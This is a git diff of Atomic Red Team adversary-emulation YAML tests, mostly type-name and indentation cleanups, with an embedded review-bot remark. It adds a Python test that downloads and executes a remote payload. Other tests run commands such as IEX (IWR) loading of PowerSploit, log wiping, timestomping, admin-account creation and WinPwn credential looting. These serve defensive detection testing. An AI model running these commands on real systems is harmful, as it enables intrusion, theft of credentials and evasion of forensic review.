python_binary_name: + description: Name of Python file to be compiled + type: path + default: T1059.006.pyc + dependency_executor_name: sh + dependencies: + - description: | + Requires Python + prereq_command: | + which_python=$(which python || which python3 || which python2); $which_python -V + $which_python -c 'import requests' 2>/dev/null; echo $? + get_prereq_command: | + pip install requests + executor: + command: | + which_python=$(which python || which python3 || which python2) + echo 'import requests' > #{python_script_name} + echo 'import os' >> #{python_script_name} + echo 'url = "#{script_url}"' >> #{python_script_name} + echo 'malicious_command = "#{executor} #{payload_file_name} #{script_args}"' >> #{python_script_name} + echo 'session = requests.session()' >> #{python_script_name} + echo 'source = session.get(url).content' >> #{python_script_name} + echo 'fd = open("#{payload_file_name}", "wb+")' >> #{python_script_name} + echo 'fd.write(source)' >> #{python_script_name} + echo 'fd.close()' >> #{python_script_name} + echo 'os.system(malicious_command)' >> #{python_script_name} + $which_python -c 'import py_compile; py_compile.compile("#{python_script_name}", "#{python_binary_name}")' + $which_python #{python_binary_name} + name: sh + cleanup_command: | + rm #{python_binary_name} #{python_script_name} #{payload_file_name} +- name: 'Python pty module and spawn function used to spawn sh or bash' + auto_generated_guid: 161d694c-b543-4434-85c3-c3a433e33792 + description: | + Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence + supported_platforms: + - linux + dependencies: + - description: | + Verify if python is in the environment variable path and attempt to import requests library. 
+ prereq_command: |
+ which_python=$(which python || which python3 || which python2); $which_python -V
+ $which_python -c 'import requests' 2>/dev/null; echo $?
+ get_prereq_command: |
+ pip install requests
+ executor:
+ command: |-
+ which_python=$(which python || which python3 || which python2)
+ $which_python -c "import pty;pty.spawn('/bin/sh')"
+ exit
+ $which_python -c "import pty;pty.spawn('/bin/bash')"
+ exit
+ name: bash
diff --git a/atomics/T1059.007/T1059.007.yaml b/atomics/T1059.007/T1059.007.yaml
index 989dd501..76befeaa 100644
--- a/atomics/T1059.007/T1059.007.yaml
+++ b/atomics/T1059.007/T1059.007.yaml
@@ -1,44 +1,44 @@ attack_technique: T1059.007 display_name: "Command and Scripting Interpreter: JavaScript" atomic_tests: - - name: JScript execution to gather local computer information via cscript - auto_generated_guid: 01d75adf-ca1b-4dd1-ac96-7c9550ad1035 - description: JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt - supported_platforms: - - windows - input_arguments: - jscript: - description: Path to sample script - type: string - default: PathToAtomicsFolder\T1059.007\src\sys_info.js - dependency_executor_name: powershell - dependencies: - - description: Sample script must exist on disk at specified location (#{jscript}) - prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} " - get_prereq_command: |- - New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}" - executor: - command: "cscript #{jscript} > $env:TEMP\\T1059.007.out.txt'" - cleanup_command: Remove-Item $env:TEMP\T1059.007.out.txt -ErrorAction Ignore - name: command_prompt - - name: JScript execution to gather local computer information via wscript - auto_generated_guid: 0709945e-4fec-4c49-9faf-c3c292a74484 - description: JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes. 
- supported_platforms: - - windows - input_arguments: - jscript: - description: Path to sample script - type: string - default: PathToAtomicsFolder\T1059.007\src\sys_info.js - dependency_executor_name: powershell - dependencies: - - description: Sample script must exist on disk at specified location (#{jscript}) - prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} " - get_prereq_command: |- - New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}" - executor: - command: "wscript #{jscript}" - name: command_prompt +- name: JScript execution to gather local computer information via cscript + auto_generated_guid: 01d75adf-ca1b-4dd1-ac96-7c9550ad1035 + description: JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt + supported_platforms: + - windows + input_arguments: + jscript: + description: Path to sample script + type: string + default: PathToAtomicsFolder\T1059.007\src\sys_info.js + dependency_executor_name: powershell + dependencies: + - description: Sample script must exist on disk at specified location (#{jscript}) + prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} " + get_prereq_command: |- + New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}" + executor: + command: "cscript #{jscript} > $env:TEMP\\T1059.007.out.txt'" + cleanup_command: Remove-Item $env:TEMP\T1059.007.out.txt -ErrorAction Ignore + name: command_prompt +- name: JScript execution to gather local computer information via wscript + auto_generated_guid: 0709945e-4fec-4c49-9faf-c3c292a74484 + description: JScript execution test, execute JScript via 
wscript command. When successful, system information will be shown with four message boxes. + supported_platforms: + - windows + input_arguments: + jscript: + description: Path to sample script + type: string + default: PathToAtomicsFolder\T1059.007\src\sys_info.js + dependency_executor_name: powershell + dependencies: + - description: Sample script must exist on disk at specified location (#{jscript}) + prereq_command: "if (Test-Path #{jscript}) {exit 0} else {exit 1} " + get_prereq_command: |- + New-Item -ItemType Directory (Split-Path #{jscript}) -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.007/src/sys_info.js" -OutFile "#{jscript}" + executor: + command: "wscript #{jscript}" + name: command_prompt diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml index ca4b2d31..13d6c9ce 100644 --- a/atomics/T1069.002/T1069.002.yaml +++ b/atomics/T1069.002/T1069.002.yaml @@ -25,7 +25,7 @@ atomic_tests: input_arguments: user: description: User to identify what groups a user is a member of - type: String + type: string default: administrator executor: command: | @@ -76,10 +76,10 @@ atomic_tests: input_arguments: computer_name: description: hostname of the computer to analyze - type: Path + type: path default: $env:COMPUTERNAME executor: - command: | + command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" name: powershell @@ -88,7 +88,7 @@ atomic_tests: description: | When successful, accounts that do not require kerberos pre-auth will be returned supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | 
@@ -110,7 +110,7 @@ atomic_tests: get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -118,7 +118,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -164,7 +164,7 @@ atomic_tests: When successful, accounts that do not require kerberos pre-auth will be returned. Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | @@ -194,7 +194,7 @@ atomic_tests: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins" - name: powershell + name: powershell - name: Get-DomainGroup with PowerView auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230 description: | @@ -205,4 +205,4 @@ atomic_tests: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose - name: powershell + name: powershell 
diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml index fdd29975..c7ff9bfe 100644 --- a/atomics/T1070.001/T1070.001.yaml +++ b/atomics/T1070.001/T1070.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: log_name: description: Windows Log Name, ex System - type: String + type: string default: System executor: command: | diff --git a/atomics/T1070.002/T1070.002.yaml b/atomics/T1070.002/T1070.002.yaml index b1284938..a1561ada 100644 --- a/atomics/T1070.002/T1070.002.yaml +++ b/atomics/T1070.002/T1070.002.yaml @@ -23,7 +23,7 @@ atomic_tests: input_arguments: username: description: Username of mail spool - type: String + type: string default: root executor: command: | @@ -38,9 +38,9 @@ atomic_tests: input_arguments: log_path: description: Path of specified log - type: Path + type: path default: /var/log/secure executor: command: | echo 0> #{log_path} - name: bash \ No newline at end of file + name: bash diff --git a/atomics/T1070.004/T1070.004.yaml b/atomics/T1070.004/T1070.004.yaml index c6b1aa9b..179b467b 100644 --- a/atomics/T1070.004/T1070.004.yaml +++ b/atomics/T1070.004/T1070.004.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: file_to_delete: description: Path of file to delete - type: Path + type: path default: /tmp/victim-files/a executor: command: | @@ -27,7 +27,7 @@ atomic_tests: input_arguments: folder_to_delete: description: Path of folder to delete - type: Path + type: path default: /tmp/victim-files executor: command: | @@ -42,7 +42,7 @@ atomic_tests: input_arguments: file_to_shred: description: Path of file to shred - type: Path + type: path default: /tmp/victim-shred.txt executor: command: | 
@@ -57,8 +57,9 @@ atomic_tests: - windows input_arguments: file_to_delete: - description: File to delete. Run the prereq command to create it if it does not exist. - type: String + description: File to delete. Run the prereq command to create it if it does + not exist. + type: string default: '%temp%\deleteme_T1551.004' dependency_executor_name: command_prompt dependencies: @@ -82,7 +83,7 @@ atomic_tests: input_arguments: folder_to_delete: description: Folder to delete. Run the prereq command to create it if it does not exist. - type: String + type: string default: '%temp%\deleteme_T1551.004' dependency_executor_name: command_prompt dependencies: @@ -105,7 +106,7 @@ atomic_tests: input_arguments: file_to_delete: description: File to delete. Run the prereq command to create it if it does not exist. - type: String + type: string default: $env:TEMP\deleteme_T1551.004 dependency_executor_name: powershell dependencies: @@ -128,7 +129,7 @@ atomic_tests: input_arguments: folder_to_delete: description: Folder to delete. Run the prereq command to create it if it does not exist. - type: String + type: string default: $env:TEMP\deleteme_folder_T1551.004 dependency_executor_name: powershell dependencies: @@ -177,7 +178,7 @@ atomic_tests: input_arguments: teamviewer_log_file: description: Teamviewer log file to create and delete. - type: String + type: string default: $env:TEMP\TeamViewer_54.log executor: command: | diff --git a/atomics/T1070.005/T1070.005.yaml b/atomics/T1070.005/T1070.005.yaml index a056053b..7d841cd4 100644 --- a/atomics/T1070.005/T1070.005.yaml +++ b/atomics/T1070.005/T1070.005.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: share_name: description: Share to add. - type: String + type: string default: '\\test\share' executor: command: | @@ -26,7 +26,7 @@ atomic_tests: input_arguments: share_name: description: Share to remove. - type: String + type: string default: '\\test\share' executor: command: | 
@@ -41,7 +41,7 @@ atomic_tests: input_arguments: share_name: description: Share to remove. - type: String + type: string default: '\\test\share' executor: command: | @@ -60,13 +60,13 @@ atomic_tests: - windows executor: command: | - reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f - reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f cleanup_command: | - reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /f - reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /f + reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /f + reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /f name: command_prompt - elevation_required: true + elevation_required: true - name: Remove Administrative Shares auto_generated_guid: 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 description: | diff --git a/atomics/T1070.006/T1070.006.yaml b/atomics/T1070.006/T1070.006.yaml index 7abc8c98..928dbf1c 100644 --- a/atomics/T1070.006/T1070.006.yaml +++ b/atomics/T1070.006/T1070.006.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: target_filename: description: Path of file that we are going to stomp on last access time - type: Path + type: path default: /opt/filename executor: command: | 
@@ -27,7 +27,7 @@ atomic_tests: input_arguments: target_filename: description: Path of file that we are going to stomp on last access time - type: Path + type: path default: /opt/filename executor: command: | @@ -46,7 +46,7 @@ atomic_tests: input_arguments: target_filename: description: Path of file that we are going to stomp on last access time - type: Path + type: path default: /opt/filename executor: command: | @@ -68,11 +68,11 @@ atomic_tests: input_arguments: target_file_path: description: Path of file to modify timestamps of - type: Path + type: path default: /opt/filename reference_file_path: description: Path of reference file to read timestamps from - type: Path + type: path default: /bin/sh executor: command: | @@ -88,11 +88,11 @@ atomic_tests: input_arguments: target_date_time: description: Date/time to replace original timestamps with - type: String + type: string default: 01/01/1970 00:00:00 file_path: description: Path of file to change creation timestamp - type: Path + type: path default: $env:TEMP\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: @@ -117,11 +117,11 @@ atomic_tests: input_arguments: target_date_time: description: Date/time to replace original timestamps with - type: String + type: string default: 01/01/1970 00:00:00 file_path: description: Path of file to change modified timestamp - type: Path + type: path default: $env:TEMP\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: @@ -146,11 +146,11 @@ atomic_tests: input_arguments: target_date_time: description: Date/time to replace original timestamps with - type: String + type: string default: 01/01/1970 00:00:00 file_path: description: Path of file to change last access timestamp - type: Path + type: path default: $env:TEMP\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: 
@@ -178,7 +178,7 @@ atomic_tests: input_arguments: file_path: description: File path for timestomp payload - type: String + type: string default: $env:appdata\Microsoft dependency_executor_name: powershell dependencies: diff --git a/atomics/T1071.001/T1071.001.yaml b/atomics/T1071.001/T1071.001.yaml index 80812544..e7088bae 100644 --- a/atomics/T1071.001/T1071.001.yaml +++ b/atomics/T1071.001/T1071.001.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: domain: description: Default domain to simulate against - type: String + type: string default: www.google.com executor: command: | 
@@ -34,24 +34,24 @@ atomic_tests: input_arguments: domain: description: Default domain to simulate against - type: String + type: string default: www.google.com curl_path: description: path to curl.exe - type: Path + type: path default: C:\Windows\System32\Curl.exe - dependency_executor_name: powershell - dependencies: - - description: | - Curl must be installed on system - prereq_command: | - if (Test-Path #{curl_path}) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path} - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + dependency_executor_name: powershell + dependencies: + - description: | + Curl must be installed on system + prereq_command: | + if (Test-Path #{curl_path}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip + Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl + Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path} + Remove-Item $env:temp\curl + Remove-Item $env:temp\curl.zip executor: command: | #{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1 @@ -70,7 +70,7 @@ atomic_tests: input_arguments: domain: description: Default domain to simulate against - type: String + type: string default: www.google.com executor: command: | diff --git a/atomics/T1071.004/T1071.004.yaml b/atomics/T1071.004/T1071.004.yaml index e913e9bd..d470b3ba 100644 --- a/atomics/T1071.004/T1071.004.yaml +++ b/atomics/T1071.004/T1071.004.yaml 
@@ -12,19 +12,19 @@ atomic_tests: input_arguments: query_type: description: DNS query type - type: String + type: string default: TXT subdomain: description: Subdomain prepended to the domain name - type: String + type: string default: atomicredteam query_volume: description: Number of DNS queries to send - type: Integer + type: integer default: 1000 domain: description: Default domain to simulate against - type: String + type: string default: 127.0.0.1.xip.io executor: command: | @@ -41,27 +41,27 @@ atomic_tests: input_arguments: runtime: description: Time in minutes to run the simulation - type: Integer + type: integer default: 30 domain: description: Default domain to simulate against - type: String + type: string default: 127.0.0.1.xip.io subdomain: description: Subdomain prepended to the domain name - type: String + type: string default: atomicredteam query_type: description: DNS query type - type: String + type: string default: TXT c2_interval: description: Seconds between C2 requests to the command and control server - type: Integer + type: integer default: 30 c2_jitter: description: Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests - type: Integer + type: integer default: 20 executor: command: | @@ -79,15 +79,15 @@ atomic_tests: input_arguments: query_type: description: DNS query type - type: String + type: string default: TXT subdomain: description: Subdomain prepended to the domain name (should be 63 characters to test maximum length) - type: String + type: string default: atomicredteamatomicredteamatomicredteamatomicredteamatomicredte domain: description: Default domain to simulate against - type: String + type: string default: 127.0.0.1.xip.io executor: command: | 
@@ -108,11 +108,11 @@ atomic_tests:
 input_arguments:
 domain:
 description: Domain Name configured to use DNS Server where your C2 listener is running
- type: String
+ type: string
 default: example.com
 server_ip:
 description: IP address of DNS server where your C2 listener is running
- type: String
+ type: string
 default: 127.0.0.1
 executor:
 command: |
diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml
index 7a114eea..1adc6edc 100644
--- a/atomics/T1072/T1072.yaml
+++ b/atomics/T1072/T1072.yaml
@@ -1,68 +1,66 @@
 attack_technique: T1072
 display_name: Software Deployment Tools
 atomic_tests:
-- name: Radmin Viewer Utility
+- name: Radmin Viewer Utility
 auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
 description: |
 An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
 supported_platforms:
- - windows
+ - windows
 input_arguments:
 radmin_installer:
 description: Radmin Viewer installer
- type: Path
+ type: path
 default: 'RadminViewer.msi'
 radmin_exe:
 description: The radmin.exe executable from RadminViewer.msi
- type: Path
+ type: path
 default: 'Radmin Viewer 3/Radmin.exe'
- dependency_executor_name: powershell
 dependencies:
- - description: |
- Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
- prereq_command: |
- if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1}
- get_prereq_command: |
- Write-Host Downloading radmin installer
- (New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}")
- Write-Host Install Radmin
- Start-Process msiexec -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn
+ - description: |
+ Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
+ prereq_command: |
+ if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Write-Host Downloading radmin installer
+ (New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}")
+ Write-Host Install Radmin
+ Start-Process msiexec -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn
 executor:
 name: command_prompt
- elevation_required: true
- command: |
+ elevation_required: true
+ command: |
 "%PROGRAMFILES(x86)%/#{radmin_exe}"
-
+
 - name: PDQ Deploy RAT
 auto_generated_guid: e447b83b-a698-4feb-bed1-a7aaf45c3443
 description: |
 An adversary may use PDQ Deploy Software to deploy the Remote Adminstartion Tool, this will start the PDQ console.
 supported_platforms:
- - windows
+ - windows
 input_arguments:
 PDQ_Deploy_installer:
 description: PDQ Deploy Install
- type: Path
+ type: path
 default: 'PDQDeploysetup.exe'
 PDQ_Deploy_exe:
 description: The PDQDeployConsole.exe executable from PDQDeploysetup.exe
- type: Path
+ type: path
 default: 'Admin Arsenal/PDQ Deploy/PDQDeployConsole.exe'
- dependency_executor_name: powershell
 dependencies:
- - description: |
- PDQ Deploy will be installed at specified location (#{PDQ_Deploy_exe})
- prereq_command: |
- if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1}
- get_prereq_command: |
- Write-Host Downloading PDQ Deploy installer
- (New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}")
- Write-Host Install PDQ Deploy
- Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s"
+ - description: |
+ PDQ Deploy will be installed at specified location (#{PDQ_Deploy_exe})
+ prereq_command: |
+ if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1}
+ get_prereq_command: |
+ Write-Host Downloading PDQ Deploy installer
+ (New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}")
+ Write-Host Install PDQ Deploy
+ Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s"
 executor:
 name: command_prompt
- elevation_required: true
- command: |
+ elevation_required: true
+ command: |
 "%PROGRAMFILES(x86)%/#{PDQ_Deploy_exe}"
diff --git a/atomics/T1074.001/T1074.001.yaml b/atomics/T1074.001/T1074.001.yaml
index 3db37d0d..9ad8aaa6 100644
--- a/atomics/T1074.001/T1074.001.yaml
+++ b/atomics/T1074.001/T1074.001.yaml
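Review bot: Both tests in this hunk delete `dependency_executor_name: powershell` but keep PowerShell-only dependency bodies (`if (Test-Path ...) {exit 0} else {exit 1}`, `(New-Object Net.WebClient).DownloadFile(...)`, `Start-Process ... -Wait`) while the test executor stays `command_prompt`. If the runner falls back to the test's executor when no dependency executor is declared, cmd.exe will reject those lines, the prerequisite check will fail, and the installer step will never run, so the atomic silently degrades to an unrunnable test. Restore `  dependency_executor_name: powershell` immediately above `  dependencies:` in both the Radmin Viewer and PDQ Deploy tests. Separately, each get_prereq_command downloads a vendor installer and runs it silently under an elevated session (`msiexec ... /qn`, `-ArgumentList "/s"`) with no hash or signature check; a description caveat such as `Downloads and silently installs a third-party installer as admin without integrity verification; run only in a lab or pin the download and verify its hash first.` would warn operators before they execute it.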
@@ -11,7 +11,7 @@ atomic_tests: input_arguments: output_file: description: Location to save downloaded discovery.bat file - type: Path + type: path default: $env:TEMP\discovery.bat executor: command: | @@ -29,7 +29,7 @@ atomic_tests: input_arguments: output_file: description: Location to save downloaded discovery.bat file - type: Path + type: path default: /tmp/T1074.001_discovery.log executor: command: | @@ -45,11 +45,11 @@ atomic_tests: input_arguments: output_file: description: Location to save zipped file or folder - type: Path + type: path default: $env:TEMP\Folder_to_zip.zip input_file: description: Location of file or folder to zip - type: Path + type: path default: PathToAtomicsFolder\T1074.001\bin\Folder_to_zip executor: command: | @@ -57,4 +57,3 @@ atomic_tests: cleanup_command: | Remove-Item -Path #{output_file} -ErrorAction Ignore name: powershell - diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml index 91579937..ae88fe63 100644 --- a/atomics/T1078.001/T1078.001.yaml +++ b/atomics/T1078.001/T1078.001.yaml @@ -11,23 +11,23 @@ atomic_tests: input_arguments: guest_user: description: Specify the guest account - type: String + type: string default: guest guest_password: description: Specify the guest password - type: String + type: string default: Password123! local_admin_group: description: Specify the admin localgroup name - type: String + type: string default: Administrators remote_desktop_users_group_name: description: Specify the remote desktop users group name - type: String + type: string default: Remote Desktop Users remove_rdp_access_during_cleanup: description: Set to 1 if you want the cleanup to remove RDP access to machine - type: Integer + type: integer default: 0 executor: command: |- 
@@ -56,13 +56,13 @@ atomic_tests: input_arguments: guest_user: description: Specify the guest account - type: String + type: string default: guest executor: command: | - net user #{guest_user} /active:yes + net user #{guest_user} /active:yes cleanup_command: | - net user #{guest_user} /active:no + net user #{guest_user} /active:no name: command_prompt elevation_required: true diff --git a/atomics/T1078.003/T1078.003.yaml b/atomics/T1078.003/T1078.003.yaml index f219e9cd..2867ae15 100644 --- a/atomics/T1078.003/T1078.003.yaml +++ b/atomics/T1078.003/T1078.003.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: password: description: Password for art-test user - type: String + type: string default: -4RTisCool!-321 executor: command: |- @@ -22,7 +22,7 @@ atomic_tests: net user art-test /delete >nul 2>&1 name: command_prompt elevation_required: true - + - name: Create local account with admin privileges - MacOS auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa description: After execution the new account will be active and added to the Administrators group @@ -42,7 +42,7 @@ atomic_tests: sudo dscl . -delete /Users/AtomicUser name: bash elevation_required: true -- name: WinPwn - Loot local Credentials - powerhell kittie +- name: WinPwn - Loot local Credentials - powerhell kittie auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912 description: Loot local Credentials - powerhell kittie technique via function of WinPwn supported_platforms: diff --git a/atomics/T1078.004/T1078.004.yaml b/atomics/T1078.004/T1078.004.yaml index 96f34cf6..8ec0c757 100644 --- a/atomics/T1078.004/T1078.004.yaml +++ b/atomics/T1078.004/T1078.004.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1078.004 display_name: 'Valid Accounts: Cloud Accounts' 
@@ -9,28 +8,28 @@ atomic_tests: GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. supported_platforms: - - google-workspace - - iaas:gcp + - google-workspace + - iaas:gcp input_arguments: project-id: description: ID of the project, you want to create service account as well as service account key for - type: String + type: string default: art-project-1 service-account-name: description: Name of the service account - type: String + type: string default: gcp-art-service-account-1 service-account-email: description: Email of the service account - type: String + type: string default: gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com output-key-file: description: Email of the service account - type: String + type: string default: gcp-art-service-account-1.json executor: @@ -46,11 +45,9 @@ atomic_tests: dependency_executor_name: sh dependencies: - - description: | - Requires gcloud - prereq_command: | - if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - get_prereq_command: | - echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - - + - description: | + Requires gcloud + prereq_command: | + if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index 378fb2bc..050bf4bd 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -33,7 +33,7 @@ atomic_tests: input_arguments: output_file: description: Output file used to store the results. - type: Path + type: path default: /tmp/T1082.txt executor: command: | 
@@ -119,17 +119,17 @@ atomic_tests: input_arguments: vbscript: description: Path to sample script - type: String + type: string default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs dependency_executor_name: powershell dependencies: - - description: | - Sample script file must exist on disk at specified location (#{vbscript}) - prereq_command: | - if (Test-Path #{vbscript}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}" + - description: | + Sample script file must exist on disk at specified location (#{vbscript}) + prereq_command: | + if (Test-Path #{vbscript}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}" executor: command: 'cscript #{vbscript}' name: powershell @@ -167,7 +167,7 @@ atomic_tests: name: sh - name: WinPwn - winPEAS auto_generated_guid: eea1d918-825e-47dd-acc2-814d6c58c0e1 - description: Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn + description: Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn supported_platforms: - windows executor: @@ -178,7 +178,7 @@ atomic_tests: name: powershell - name: WinPwn - itm4nprivesc auto_generated_guid: 3d256a2f-5e57-4003-8eb6-64d91b1da7ce - description: Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn + description: Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn supported_platforms: - windows executor: 
